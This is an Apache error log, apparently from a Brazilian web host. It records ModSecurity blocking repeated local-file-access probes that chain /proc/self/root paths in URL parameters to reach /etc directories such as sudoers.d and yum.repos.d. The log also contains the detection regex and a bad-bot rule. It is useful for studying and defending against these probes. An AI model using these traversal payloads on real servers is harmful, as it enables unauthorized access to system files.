[Fri Mar 20 09:37:57.457268 2026] [:error] [pid 21219:tid 140411708356352] [client 74.7.243.128:55846] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/sysctl.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0_pfXLqtnMIWvjpaKt_AAAAoQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 09:37:59.805988 2026] [:error] [pid 21219:tid 140411590858496] [client 74.7.243.128:55862] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/raddb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0_p_XLqtnMIWvjpaKuAgAAApI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 09:38:01.127695 2026] [:error] [pid 11642:tid 140411658000128] [client 74.7.243.128:41590] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/udev"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0_qbninkcc-iUj5ApxnwAAA4o"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 09:38:02.552369 2026] [:error] [pid 11167:tid 140411699963648] [client 74.7.243.128:41594] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/dovecot"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0_qvHIg5MgXLBnicMLagAAAcU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 09:38:03.800731 2026] [:error] [pid 11167:tid 140411582465792] [client 74.7.243.128:41598] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/lldpd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0_q_HIg5MgXLBnicMLbQAAAdM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 09:38:05.340237 2026] [:error] [pid 10189:tid 140411540502272] [client 74.7.243.128:41612] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/dracut.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0_rTJ3M9BSuKP7CAY0UwAAAJg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 09:38:06.663460 2026] [:error] [pid 9818:tid 140411699963648] [client 74.7.243.128:41618] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/selinux"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0_rl1pVZ5mVmJwsFNExwAAAEU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 09:38:08.007586 2026] [:error] [pid 7893:tid 140411590858496] [client 74.7.243.128:41624] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/yum"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0_sBCii7xarUs8iHZ74wAAAhI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 09:38:09.311057 2026] [:error] [pid 9818:tid 140411599251200] [client 74.7.243.128:41636] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/sysconfig"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0_sV1pVZ5mVmJwsFNEygAAAFE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 09:38:10.594367 2026] [:error] [pid 31215:tid 140411683178240] [client 74.7.243.128:49694] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/tuned"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0_sgF0L0L-SsrnPo580wAAAsc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 09:38:11.930963 2026] [:error] [pid 31215:tid 140411540502272] [client 74.7.243.128:49696] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/ld.so.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0_swF0L0L-SsrnPo581gAAAtg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 09:38:13.200415 2026] [:error] [pid 15826:tid 140411691570944] [client 74.7.243.128:49702] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/pm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0_teoXxyEfFpUF8f-U3gAAAUY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 09:38:14.516159 2026] [:error] [pid 11167:tid 140411557287680] [client 74.7.243.128:49710] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/rwtab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0_tvHIg5MgXLBnicMLcwAAAdY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 09:38:15.749077 2026] [:error] [pid 10189:tid 140411716749056] [client 74.7.243.128:49720] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/yum.repos.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0_tzJ3M9BSuKP7CAY0cAAAAIM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 09:38:17.071441 2026] [:error] [pid 26799:tid 140411658000128] [client 74.7.243.128:49728] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/sudoers.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0_uda6ubjKNq_cu4bt6gAAA0o"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 09:38:24.585812 2026] [mime_magic:error] [pid 31215:tid 140411590858496] (70014)End of file found: [client 57.141.18.25:52766] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 09:38:33.011860 2026] [:error] [pid 11642:tid 140411641214720] [client 74.7.243.128:51240] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/rsyslog.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0_ybninkcc-iUj5ApxuQAAA4w"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 09:38:42.291446 2026] [:error] [pid 31215:tid 140411632822016] [client 74.7.243.128:44404] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/groff"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0_0gF0L0L-SsrnPo585wAAAs0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 09:38:50.256091 2026] [:error] [pid 10189:tid 140411649607424] [client 74.7.228.61:39314] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "ab0_2jJ3M9BSuKP7CAY0oQAAAIs"]
[Fri Mar 20 09:38:51.911864 2026] [:error] [pid 26799:tid 140411699963648] [client 74.7.243.128:53094] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/aliases"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0_29a6ubjKNq_cu4buAAAAA0U"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 09:38:57.562161 2026] [:error] [pid 7235:tid 140411733534464] [client 74.7.243.128:55800] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0_4fqxLDW4GITHUkT9sAAAAQE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 09:39:57.514795 2026] [mime_magic:error] [pid 21219:tid 140411557287680] (70014)End of file found: [client 216.73.216.191:56150] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 09:39:57.783521 2026] [:error] [pid 7893:tid 140411649607424] [client 74.7.243.128:55802] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/ntp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1AHRCii7xarUs8iHZ8UwAAAgs"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 09:40:00.974270 2026] [:error] [pid 11642:tid 140411565680384] [client 74.7.243.128:43150] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/groff"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri 